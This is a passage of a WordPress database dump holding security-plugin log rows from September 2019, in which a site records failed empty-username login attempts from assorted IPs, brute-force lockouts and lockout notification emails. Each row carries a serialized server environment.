\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYEwliJ7D9Gn7wDPh8WagAAAMA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569064131.022\";s:12:\"REQUEST_TIME\";s:10:\"1569064131\";}}','notice','2019-09-21 11:08:53','2019-09-21 11:08:51',17794800,19286592,'https://bintara.com.my/wp/wp-login.php',1,0,'5.196.118.54'),(25494,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:08:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:08:51\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:23:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:23:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:08:53','2019-09-21 11:08:51',17878760,19286592,'https://bintara.com.my/wp/wp-login.php',1,0,'5.196.118.54'),(25495,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:08:53','2019-09-21 11:08:51',18084776,19286592,'https://bintara.com.my/wp/wp-login.php',1,0,'5.196.118.54'),(25496,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYEyXkXpgmG5P@iB8kSNwAAAIA\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.74.122.254\";s:11:\"REMOTE_PORT\";s:5:\"57498\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYEyXkXpgmG5P@iB8kSNwAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064137.6982\";s:12:\"REQUEST_TIME\";s:10:\"1569064137\";}}','notice','2019-09-21 11:08:59','2019-09-21 11:08:58',17798616,19288952,'https://bintara.com.my/2019/wp-login.php',1,0,'103.74.122.254'),(25497,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:08:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:08:58\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:23:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:23:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:08:59','2019-09-21 11:08:58',17883376,19288952,'https://bintara.com.my/2019/wp-login.php',1,0,'103.74.122.254'),(25498,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:08:59','2019-09-21 11:08:58',18089176,19288952,'https://bintara.com.my/2019/wp-login.php',1,0,'103.74.122.254'),(25499,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYFH1iJ7D9Gn7wDPh8WjAAAANI\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"89.221.219.30\";s:11:\"REMOTE_PORT\";s:5:\"34708\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYFH1iJ7D9Gn7wDPh8WjAAAANI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569064223.228\";s:12:\"REQUEST_TIME\";s:10:\"1569064223\";}}','notice','2019-09-21 11:10:24','2019-09-21 11:10:23',17794936,19285744,'https://bintara.com.my/2019/wp-login.php',1,0,'89.221.219.30'),(25500,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:10:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:10:23\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:25:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:25:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:10:24','2019-09-21 11:10:23',17879576,19285744,'https://bintara.com.my/2019/wp-login.php',1,0,'89.221.219.30'),(25501,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:10:24','2019-09-21 11:10:23',18085224,19285744,'https://bintara.com.my/2019/wp-login.php',1,0,'89.221.219.30'),(25502,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYFH3kXpgmG5P@iB8kShAAAAJU\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"107.189.3.126\";s:11:\"REMOTE_PORT\";s:5:\"50324\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYFH3kXpgmG5P@iB8kShAAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064223.7561\";s:12:\"REQUEST_TIME\";s:10:\"1569064223\";}}','notice','2019-09-21 11:10:25','2019-09-21 11:10:24',17794936,19285744,'https://bintara.com.my/2019/wp-login.php',1,0,'107.189.3.126'),(25503,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:10:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:10:24\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:25:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:25:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:10:26','2019-09-21 11:10:24',17879576,19285744,'https://bintara.com.my/2019/wp-login.php',1,0,'107.189.3.126'),(25504,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:10:26','2019-09-21 11:10:24',18085224,19285744,'https://bintara.com.my/2019/wp-login.php',1,0,'107.189.3.126'),(25505,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYFL3kXpgmG5P@iB8kSkAAAAJQ\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"91.121.110.166\";s:11:\"REMOTE_PORT\";s:5:\"60622\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYFL3kXpgmG5P@iB8kSkAAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064239.4866\";s:12:\"REQUEST_TIME\";s:10:\"1569064239\";}}','notice','2019-09-21 11:10:40','2019-09-21 11:10:39',17794960,19287264,'https://bintara.com.my/blog/wp-login.php',1,0,'91.121.110.166'),(25506,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:10:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:10:39\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:25:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:25:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:10:40','2019-09-21 11:10:39',17879648,19287264,'https://bintara.com.my/blog/wp-login.php',1,0,'91.121.110.166'),(25507,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:10:40','2019-09-21 11:10:39',18085296,19287264,'https://bintara.com.my/blog/wp-login.php',1,0,'91.121.110.166');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (25508,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYFYViJ7D9Gn7wDPh8WzQAAAMw\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.245.137\";s:11:\"REMOTE_PORT\";s:5:\"40342\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYFYViJ7D9Gn7wDPh8WzQAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569064291.3697\";s:12:\"REQUEST_TIME\";s:10:\"1569064291\";}}','notice','2019-09-21 11:11:32','2019-09-21 11:11:31',17799712,19291000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'138.68.245.137'),(25509,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:11:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:11:31\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:26:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:26:31\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:11:32','2019-09-21 11:11:31',17884456,19291000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'138.68.245.137'),(25510,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:11:32','2019-09-21 11:11:31',18090272,19291000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'138.68.245.137'),(25511,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 